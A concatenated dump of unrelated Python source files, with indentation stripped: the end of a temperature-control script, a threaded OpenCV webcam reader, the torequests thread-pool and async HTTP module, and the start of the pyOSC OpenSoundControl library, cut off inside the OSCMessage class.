self.pc = "DONE"
else:
self.temperature -= self.delta
print(self.pc, self.temperature)
# Run with default parameters, without ask
# for initial values
if len(sys.argv) == 2 and sys.argv[1] == '-0':
ec = ExperimentControl()
else:
init_temp = input("Enter the initial temperature: ")
low_temp = input("Enter the lower temperature: ")
higher_temp = input("Enter the higher temperature: ")
delta = input("Enter the amount temperature to increase or decrease the temperature: ")
ec = ExperimentControl(init_temp, low_temp, higher_temp, delta)
|
webcamvideostream.py
|
import cv2
from threading import Thread
import time
import numpy as np
class WebcamVideoStream:
def __init__(self, src = 0):
print("init")
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
time.sleep(2.0)
def start(self):
print("start thread")
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
print("read")
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
return self.frame
def stop(self):
self.stopped = True
|
main.py
|
#! coding:utf-8
# python2 requires: pip install futures
import atexit
from concurrent.futures import (ProcessPoolExecutor, ThreadPoolExecutor,
as_completed)
from concurrent.futures._base import (CANCELLED, CANCELLED_AND_NOTIFIED,
FINISHED, PENDING, RUNNING,
CancelledError, Error, Executor, Future,
TimeoutError)
from concurrent.futures.thread import _threads_queues, _WorkItem
from functools import wraps
from logging import getLogger
from threading import Thread, Timer
from time import sleep
from time import time as time_time
from weakref import WeakSet
from requests import PreparedRequest, RequestException, Session
from requests.adapters import HTTPAdapter
from urllib3 import disable_warnings
from .configs import Config
from .exceptions import FailureException, ValidationError
from .frequency_controller.sync_tools import Frequency
from .versions import PY2, PY3
try:
from queue import Empty, Queue
except ImportError:
from Queue import Empty, Queue
if PY3:
from concurrent.futures.process import BrokenProcessPool
__all__ = [
"Pool", "ProcessPool", "NewFuture", "Async", "threads",
"get_results_generator", "run_after_async", "tPool", "get", "post",
"options", "delete", "put", "head", "patch", "request", "disable_warnings",
"Workshop"
]
logger = getLogger("torequests")
def _abandon_all_tasks():
"""Only used for abandon_all_tasks and exit the main thread,
to prevent the main thread waiting for unclosed thread while exiting."""
_threads_queues.clear()
def ensure_waiting_for_threads():
if Config.wait_futures_before_exiting:
_abandon_all_tasks()
atexit.register(ensure_waiting_for_threads)
class NewExecutorPoolMixin(Executor):
"""Add async_func decorator for wrapping a function to return the NewFuture."""
def async_func(self, function):
"""Decorator for let a normal function return the NewFuture"""
@wraps(function)
def wrapped(*args, **kwargs):
return self.submit(function, *args, **kwargs)
return wrapped
def close(self, wait=True):
"""Same as self.shutdown"""
return self.shutdown(wait=wait)
def _get_cpu_count(self):
"""Get the cpu count."""
try:
from multiprocessing import cpu_count
return cpu_count()
except Exception as e:
logger.error("_get_cpu_count failed for %s" % e)
@property
def x(self):
"""Return self.wait_futures_done"""
return self.wait_futures_done(list(self._all_futures))
def wait_futures_done(self, tasks=None):
# ignore the order of tasks
tasks = tasks or self._all_futures
fs = []
try:
for f in as_completed(tasks, timeout=self._timeout):
fs.append(f.x)
except TimeoutError:
pass
return fs
class Pool(ThreadPoolExecutor, NewExecutorPoolMixin):
"""Let ThreadPoolExecutor use NewFuture instead of origin concurrent.futures.Future.
WARNING: NewFutures in Pool will not block main thread without NewFuture.x.
Basic Usage::
from torequests.main import Pool
import time
pool = Pool()
def use_submit(i):
time.sleep(i)
result = 'use_submit: %s' % i
print(result)
return result
@pool.async_func
def use_decorator(i):
time.sleep(i)
result = 'use_decorator: %s' % i
print(result)
return result
tasks = [pool.submit(use_submit, i) for i in (2, 1, 0)
] + [use_decorator(i) for i in (2, 1, 0)]
# pool.x can be ignore
pool.x
results = [i.x for i in tasks]
print(results)
# use_submit: 0
# use_decorator: 0
# use_submit: 1
# use_decorator: 1
# use_submit: 2
# use_decorator: 2
# ['use_submit: 2', 'use_submit: 1', 'use_submit: 0', 'use_decorator: 2', 'use_decorator: 1', 'use_decorator: 0']
"""
def __init__(self,
n=None,
timeout=None,
default_callback=None,
catch_exception=True,
*args,
**kwargs):
n = n or kwargs.pop("max_workers", None)
if PY2 and n is None:
# python2 n!=None
n = (self._get_cpu_count() or 1) * 5
super(Pool, self).__init__(n, *args, **kwargs)
#: set the default timeout
self._timeout = timeout
#: set the default_callback if not set single task's callback
self.default_callback = default_callback
#: WeakSet of _all_futures for self.x
self._all_futures = WeakSet()
#: catch_exception=True will not raise exceptions, return object FailureException(exception)
self.catch_exception = catch_exception
@property
def all_tasks(self):
"""Keep the same api for dummy, return self._all_futures actually"""
return self._all_futures
def submit(self, func, *args, **kwargs):
"""Submit a function to the pool, `self.submit(function,arg1,arg2,arg3=3)`"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError("cannot schedule new futures after shutdown")
callback = kwargs.pop("callback", self.default_callback)
future = NewFuture(
self._timeout,
args,
kwargs,
callback=callback,
catch_exception=self.catch_exception,
)
w = _WorkItem(future, func, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._all_futures.add(future)
return future
class ProcessPool(ProcessPoolExecutor, NewExecutorPoolMixin):
"""Simple ProcessPool covered ProcessPoolExecutor.
::
from torequests.main import ProcessPool
import time
pool = ProcessPool()
def use_submit(i):
time.sleep(i)
result = 'use_submit: %s' % i
print(result)
return result
def main():
tasks = [pool.submit(use_submit, i) for i in (2, 1, 0)]
# pool.x can be ignore
pool.x
results = [i.x for i in tasks]
print(results)
if __name__ == '__main__':
main()
# ['use_submit: 2', 'use_submit: 1', 'use_submit: 0']
# use_submit: 0
# use_submit: 1
# use_submit: 2
"""
def __init__(self,
n=None,
timeout=None,
default_callback=None,
catch_exception=True,
*args,
**kwargs):
n = n or kwargs.pop("max_workers", None)
if PY2 and n is None:
# python2 n!=None
n = self._get_cpu_count() or 1
super(ProcessPool, self).__init__(n, *args, **kwargs)
self._timeout = timeout
self.default_callback = default_callback
self._all_futures = WeakSet()
self.catch_exception = catch_exception
def submit(self, func, *args, **kwargs):
"""Submit a function to the pool, `self.submit(function,arg1,arg2,arg3=3)`"""
with self._shutdown_lock:
if PY3 and self._broken:
raise BrokenProcessPool(
"A child process terminated "
"abruptly, the process pool is not usable anymore")
if self._shutdown_thread:
raise RuntimeError("cannot schedule new futures after shutdown")
callback = kwargs.pop("callback", self.default_callback)
future = NewFuture(
self._timeout,
args,
kwargs,
callback=callback,
catch_exception=self.catch_exception,
)
w = _WorkItem(future, func, args, kwargs)
self._pending_work_items[self._queue_count] = w
self._work_ids.put(self._queue_count)
self._queue_count += 1
self._result_queue.put(None)
self._start_queue_management_thread()
if PY2:
self._adjust_process_count()
self._all_futures.add(future)
return future
def async_func(self, *args):
"""Decorator mode not support for ProcessPool for _pickle.PicklingError."""
raise NotImplementedError
class NewFuture(Future):
"""Add `.x` attribute and timeout args for original Future class
WARNING: Future thread will not stop running until function finished or pid killed.
:attr cx: blocking until the task finish and return the callback_result.
:attr x: blocking until the task finish and return the value as `coro` returned.
:attr task_start_time: timestamp when the task start up.
:attr task_end_time: timestamp when the task end up.
:attr task_cost_time: seconds of task costs.
:param catch_exception: `True` will catch all exceptions and return as :class:`FailureException <FailureException>`
"""
if PY3:
from ._py3_patch import _new_future_await
__await__ = _new_future_await
def __init__(self,
timeout=None,
args=None,
kwargs=None,
callback=None,
catch_exception=True):
super(NewFuture, self).__init__()
self._timeout = timeout
self._args = args or ()
self._kwargs = kwargs or {}
self._callback_result = None
self.catch_exception = catch_exception
self.task_start_time = time_time()
self.task_end_time = 0
self.task_cost_time = 0
self._user_callbacks = set()
if callback:
if not isinstance(callback, (list, tuple)):
callback = [callback]
for fn in callback:
self.add_done_callback(fn)
self._user_callbacks.add(fn)
def __getattr__(self, name):
return getattr(self.x, name)
def _invoke_callbacks(self):
"""Record the task_end_time & task_cost_time, set result for self._callback_result."""
self.task_end_time = time_time()
self.task_cost_time = self.task_end_time - self.task_start_time
with self._condition:
for callback in self._done_callbacks:
try:
result = callback(self)
if callback in self._user_callbacks:
self._callback_result = result
except Exception as e:
logger.error("exception calling callback for %s" % e)
self._condition.notify_all()
@property
def _callbacks(self):
"""Keep same api for NewTask."""
return self._done_callbacks
@property
def cx(self):
"""Block the main thead until future finish, return the future.callback_result."""
return self.callback_result
@property
def callback_result(self):
"""Block the main thead until future finish, return the future.callback_result."""
if self._state in [PENDING, RUNNING]:
self.x
if self._user_callbacks:
return self._callback_result
else:
return self.x
@property
def x(self):
"""Block the main thead until future finish, return the future.result()."""
with self._condition:
result = None
if not self.done():
self._condition.wait(self._timeout)
if not self.done():
# timeout
self.set_exception(TimeoutError())
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
# cancelled
result = CancelledError()
elif self._state == FINISHED:
# finished
if self._exception:
result = self._exception
else:
result = self._result
if isinstance(result, Exception):
if self.catch_exception:
result = FailureException(result)
return result
else:
raise result
return result
def Async(f, n=None, timeout=None):
"""Concise usage for pool.submit.
Basic Usage Asnyc & threads ::
from torequests.main import Async, threads
import time
def use_submit(i):
time.sleep(i)
result = 'use_submit: %s' % i
print(result)
return result
@threads()
def use_decorator(i):
time.sleep(i)
result = 'use_decorator: %s' % i
print(result)
return result
new_use_submit = Async(use_submit)
tasks = [new_use_submit(i) for i in (2, 1, 0)
] + [use_decorator(i) for i in (2, 1, 0)]
print([type(i) for i in tasks])
results = [i.x for i in tasks]
print(results)
# use_submit: 0
# use_decorator: 0
# [<class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>]
# use_submit: 1
# use_decorator: 1
# use_submit: 2
# use_decorator: 2
# ['use_submit: 2', 'use_submit: 1', 'use_submit: 0', 'use_decorator: 2', 'use_decorator: 1', 'use_decorator: 0']
"""
return threads(n=n, timeout=timeout)(f)
def threads(n=None, timeout=None):
"""Decorator usage like Async."""
return Pool(n, timeout).async_func
def get_results_generator(future_list, timeout=None, sort_by_completed=False):
"""Return as a generator of tasks order by completed sequence."""
try:
# python2 not support yield from
if sort_by_completed:
for future in as_completed(future_list, timeout=timeout):
yield future.x
else:
for future in future_list:
yield future.x
except TimeoutError:
return
def run_after_async(seconds, func, *args, **kwargs):
"""Run the function after seconds asynchronously."""
t = Timer(seconds, func, args, kwargs)
t.daemon = True
t.start()
return t
class FailedRequest(PreparedRequest):
allow_keys = {
"method",
"url",
"headers",
"files",
"data",
"params",
"auth",
"cookies",
"hooks",
"json",
}
def __init__(self, **kwargs):
# self.kwargs for retry tPool.request
self.kwargs = kwargs
filted_kwargs = {
key: value
for key, value in kwargs.items()
if key in self.allow_keys
}
super(FailedRequest, self).__init__()
self.prepare(**filted_kwargs)
class tPool(object):
"""Async wrapper for requests.
:param n: thread pool size for concurrent limit.
:param interval: time.sleep(interval) after each task finished.
:param timeout: timeout for each task.result(timeout). But it will not shutdown the raw funtion.
:param session: individually given a available requests.Session instance if necessary.
:param catch_exception: `True` will catch all exceptions and return as :class:`FailureException <FailureException>`
:param default_callback: default_callback for tasks which not set callback param.
Usage::
from torequests.main import tPool
from torequests.logs import print_info
trequests = tPool(2, 1)
test_url = 'http://p.3.cn'
ss = [
trequests.get(
test_url,
retry=2,
callback=lambda x: (len(x.content), print_info(len(x.content))))
for i in range(3)
]
# or [i.x for i in ss]
trequests.x
ss = [i.cx for i in ss]
print_info(ss)
# [2020-02-11 11:36:33] temp_code.py(10): 612
# [2020-02-11 11:36:33] temp_code.py(10): 612
# [2020-02-11 11:36:34] temp_code.py(10): 612
# [2020-02-11 11:36:34] temp_code.py(16): [(612, None), (612, None), (612, None)]
"""
def __init__(
self,
n=None,
interval=0,
timeout=None,
session=None,
catch_exception=True,
default_callback=None,
retry_exceptions=(RequestException, Error),
):
self.pool = Pool(n, timeout)
self.session = session if session else Session()
self.n = n or 10
# adapt the concurrent limit.
custom_adapter = HTTPAdapter(pool_connections=self.n,
pool_maxsize=self.n)
self.session.mount("http://", custom_adapter)
self.session.mount("https://", custom_adapter)
self.interval = interval
self.catch_exception = catch_exception
self.default_callback = default_callback
self.frequency = Frequency(self.n, self.interval)
self.retry_exceptions = retry_exceptions
@property
def all_tasks(self):
"""Return self.pool._all_futures"""
return self.pool._all_futures
@property
def x(self):
"""Return self.pool.x"""
return self.pool.x
def close(self, wait=False):
"""Close session, shutdown pool."""
self.session.close()
self.pool.shutdown(wait=wait)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __del__(self):
self.close()
def _request(self,
method,
url,
retry=0,
response_validator=None,
retry_interval=0,
**kwargs):
if not url:
raise ValueError("url should not be null, but given: %s" % url)
kwargs["url"] = url
kwargs["method"] = method
# non-official request args
referer_info = kwargs.pop("referer_info", None)
encoding = kwargs.pop("encoding", None)
error = Exception()
for _ in range(retry + 1):
with self.frequency:
try:
resp = self.session.request(**kwargs)
if encoding:
resp.encoding = encoding
logger.debug("%s done, %s" % (url, kwargs))
resp.referer_info = referer_info
if response_validator and not response_validator(resp):
raise ValidationError(response_validator.__name__)
return resp
except self.retry_exceptions as e:
error = e
logger.debug(
"Retry %s for the %s time, Exception: %r . kwargs= %s" %
(url, _ + 1, e, kwargs))
if retry_interval:
sleep(retry_interval)
continue
# for unofficial request args
kwargs["retry"] = retry
if referer_info:
kwargs["referer_info"] = referer_info
if encoding:
kwargs["encoding"] = encoding
logger.debug("Retry %s times failed again: %s." % (retry, error))
failure = FailureException(error)
failure.request = FailedRequest(**kwargs)
if self.catch_exception:
return failure
else:
raise failure
def request(self,
method,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.request`, but return as NewFuture."""
return self.pool.submit(self._request,
method=method,
url=url,
retry=retry,
response_validator=response_validator,
callback=callback or self.default_callback,
**kwargs)
def get(self,
url,
params=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.get`, but return as NewFuture."""
kwargs.setdefault("allow_redirects", True)
return self.request("get",
url=url,
params=params,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def post(self,
url,
data=None,
json=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.post`, but return as NewFuture."""
return self.request("post",
url=url,
data=data,
json=json,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def delete(self,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.delete`, but return as NewFuture."""
return self.request("delete",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def put(self,
url,
data=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.put`, but return as NewFuture."""
return self.request("put",
url=url,
data=data,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def head(self,
url,
callback=None,
retry=0,
response_validator=None,
allow_redirects=False,
**kwargs):
"""Similar to `requests.head`, but return as NewFuture."""
kwargs['allow_redirects'] = allow_redirects
return self.request("head",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def options(self,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.options`, but return as NewFuture."""
kwargs.setdefault("allow_redirects", True)
return self.request("options",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def patch(self,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.patch`, but return as NewFuture."""
return self.request("patch",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def get(url,
params=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().get(url,
params=params,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def post(url,
data=None,
json=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().post(url,
data=data,
json=json,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def delete(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().delete(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def put(url,
data=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().put(url,
data=data,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def head(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().head(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def options(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().options(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def patch(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().patch(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def request(method,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().request(method,
url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
class Workshop:
"""Simple solution for producer-consumer problem.
WARNING: callback should has its own timeout to avoid blocking to long.
Demo::
import time
from torequests.main import Workshop
def callback(todo, worker_arg):
time.sleep(todo)
if worker_arg == 'worker1':
return None
return [todo, worker_arg]
fc = Workshop(range(1, 5), ['worker1', 'worker2', 'worker3'], callback)
for i in fc.get_result_as_completed():
print(i)
# [2, 'worker2']
# [3, 'worker3']
# [1, 'worker2']
# [4, 'worker3']
for i in fc.get_result_as_sequence():
print(i)
# [1, 'worker3']
# [2, 'worker3']
# [3, 'worker3']
# [4, 'worker2']
"""
def __init__(self,
todo_args,
worker_args,
callback,
timeout=None,
wait_empty_secs=1,
handle_exceptions=(),
max_failure=None,
fail_returned=None):
"""
:param todo_args: args to be send to callback
:type todo_args: List[Any]
:param worker_args: args for launching worker threads, you can use like [worker1, worker1, worker1] for concurrent workers
:type worker_args: List[Any]
:param callback: callback to consume the todo_arg from queue, handle args like callback(todo_arg, worker_arg)
:type callback: Callable
:param timeout: timeout for worker running, defaults to None
:type timeout: [float, int], optional
:param wait_empty_secs: seconds to sleep while queue is Empty, defaults to 1
:type wait_empty_secs: float, optional
:param handle_exceptions: ignore Exceptions raise from callback, defaults to ()
:type handle_exceptions: Tuple[Exception], optional
:param max_failure: stop worker while failing too many times, defaults to None
:type max_failure: int, optional
:param fail_returned: returned from callback will be treated as a failure, defaults to None
:type fail_returned: Any, optional
"""
self.q = Queue()
self.futures = self.init_futures(todo_args)
self.worker_args = worker_args
self.callback = callback
self.timeout = timeout or float('inf')
self.wait_empty_secs = wait_empty_secs
self.result = None
self.handle_exceptions = handle_exceptions
self.max_failure = float('inf') if max_failure is None else max_failure
self.fail_returned = fail_returned
self._done = False
self._done_signal = object()
def init_futures(self, todo_args):
futures = []
for arg in todo_args:
f = Future()
f.arg = arg
futures.append(f)
self.q.put(f)
return futures
def run(self, as_completed=False):
"""run until all tasks finished"""
if as_completed:
return list(self.get_result_as_completed())
return list(self.get_result_as_sequence())
def get_result_as_sequence(self):
"""return a generator of results with same sequence as self.todo_args"""
self.start_workers()
for f in self.futures:
yield f.result()
def get_result_as_completed(self):
"""return a generator of results as completed sequence"""
self.start_workers()
for f in as_completed(self.futures):
yield f.result()
@property
def done(self):
self._done = self._done or all((f.done() for f in self.futures))
return self._done
def worker(self, worker_arg):
fails = 0
start_time = time_time()
while time_time(
) - start_time < self.timeout and fails <= self.max_failure:
try:
f = self.q.get(timeout=self.wait_empty_secs)
if f is self._done_signal:
break
except TimeoutError:
if self.done:
break
fails += 1
continue
try:
result = self.callback(f.arg, worker_arg)
except self.handle_exceptions as err:
logger.error(
'Raised {err!r}, worker_arg: {worker_arg}, todo_arg: {arg}'.
format_map(
dict(err=err,
worker_arg=repr(worker_arg)[:100],
arg=repr(f.arg)[:100])))
result = self.fail_returned
if result == self.fail_returned:
self.q.put(f)
fails += 1
sleep(self.wait_empty_secs)
continue
else:
f.set_result(result)
if fails > 0:
fails -= 1
self.q.put_nowait
def start_workers(self):
self._done = False
for worker_arg in self.worker_args:
t = Thread(target=self.worker, args=(worker_arg,))
t.daemon = True
t.start()
|
OSC.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy cration & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support fon numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [types.FloatType]
global IntTypes
IntTypes = [types.IntType]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retreiving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == types.DictType:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == types.TupleType:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
